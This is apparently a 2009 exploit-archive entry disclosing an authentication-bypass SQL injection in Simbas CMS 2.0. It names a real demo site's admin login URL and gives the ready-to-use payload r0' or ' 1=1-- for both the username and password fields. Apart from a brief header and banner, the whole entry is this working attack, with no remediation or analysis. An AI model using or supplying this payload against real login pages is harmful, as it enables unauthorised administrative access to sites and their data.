id: 5010
date: 04/08/2009
title: Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability
author: ThE g0bL!N
cves: 

========================================================
Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability
========================================================


-----------------------------------------------------
Simbas Content Management System (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Vive Algerie
# demo : http://www.officetoweb.co.uk/demo/index.asp
 
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.officetoweb.co.uk/demo/admin/default.asp
username:  r0' or ' 1=1--
Password:  r0' or ' 1=1--

demo:
-----
http://www.officetoweb.co.uk/demo/admin/default.asp
------------------------------------------------------


#  0day.today [2023-03-23]  #